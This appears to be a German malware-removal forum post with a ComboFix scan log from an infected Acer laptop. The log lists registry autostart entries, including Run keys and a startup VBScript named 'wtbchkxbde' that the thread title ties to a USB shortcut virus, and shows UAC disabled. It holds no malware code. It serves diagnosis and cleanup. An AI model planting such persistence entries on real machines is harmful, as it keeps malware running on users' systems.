2014-04-16 21:06 . 2014-04-03 07:51 88280 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-04-16 21:06 . 2014-04-03 07:50 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-04-16 21:06 . 2014-04-16 21:06 -------- d-----w- c:\users\Franz\AppData\Local\Programs
2014-04-16 00:52 . 2014-04-16 00:52 -------- d-----w- c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52 -------- d-----w- c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-20 03:21 -------- d-----w- C:\FRST
2014-04-07 07:32 . 2014-04-09 08:19 -------- d-----w- C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30 -------- d-----w- c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54 -------- d-----w- c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19 -------- d-----w- c:\programdata\Norton
2014-03-25 07:40 . 2014-03-25 07:40 -------- d-----w- C:\found.001
.
.
.
(((((((((((((((((((((((((((((((((((( Find3M Bericht ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37 22240 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
(((((((((((((((((((((((((((( Autostartpunkte der Registrierung ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
S3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
.
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - CDFS
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-02 06:02 1150280 ----a-w- c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-20 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-20 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"mwlDaemon"="c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe" [BU]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-21 01:41:59
ComboFix-quarantined-files.txt 2014-04-20 23:41
.
Vor Suchlauf: 23 Verzeichnis(se), 32.543.174.656 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 32.351.719.424 Bytes frei
.
- - End Of File - - 5DF84863D0CA34F0EF60B76EAB81F85C
Geändert von fxak (21.04.2014 um 00:52 Uhr) |
|
| Themen zu Flash Drive Shortcut Virus wtbchkxbde..vbs |
| acer, acer aspire, antivirus, avira, dateien, desktop, detected, entfernen, folge, formatieren, frage, geld, google, hängt, laptop hängt, launch, link, links auf usb-stick, logfiles, lösung, microsoft, online, problem, programme, shortcut virus, software, system32, versteckte dateien, virus, windows, zufällig |
WARNUNG an die MITLESER: 
Linear-Darstellung
